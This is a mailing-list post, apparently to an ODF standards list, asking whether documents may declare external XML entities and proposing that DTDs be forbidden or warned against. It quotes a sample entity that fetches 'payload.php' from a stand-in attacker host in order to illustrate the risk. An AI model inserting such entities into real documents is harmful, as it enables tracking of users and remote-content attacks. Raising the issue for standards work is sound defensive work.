[Date Prev] | [Thread Prev] | [Thread Next] | [Date Next] -- [Date Index] | [Thread Index] | [List Home]
Subject: ODF security hazard? (ODF all versions)
Dear all, Is an XML document starting thus, a conformant ODF document: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE office:document-content [ <!ENTITY l33thakz SYSTEM "http://my-evil-hack-site.net/payload.php"> ]> <office:document-content xmlns:office= ... (etc) ? If the ODF processor is a conformant XML processor, then it may expand that external entity reference. This is obviously a security risk enabling tracking of users of the document, modification of the content, or certain more serious kinds of attack. These vulnerabilities are well known and documented in section 10 of RFC 3023. I believe ODF should be modified to forbid the use of DTDs (as has been done in OOXML), as casual office application users cannot be expected to be aware of the security hazards implicit in this XML feature, or that every ODF document of unknown origin is a potential security risk. If not, the text of ODF 1.2 should be amended to include a prominent security warning and a pointer to RFC 3023. The text of previous versions of ODF should be modified to include such a security warning. I am *extremely* interested in this topic as I am collected use cases for a new validation language which can be used to constrain the infoset features of XML documents. Such a language could clearly be useful to declaring that DTDs are not permitted, and be of use to future versions of ODF/OOXML if they chose that route ... Thoughts please ... - Alex.
[Date Prev] | [Thread Prev] | [Thread Next] | [Date Next] -- [Date Index] | [Thread Index] | [List Home]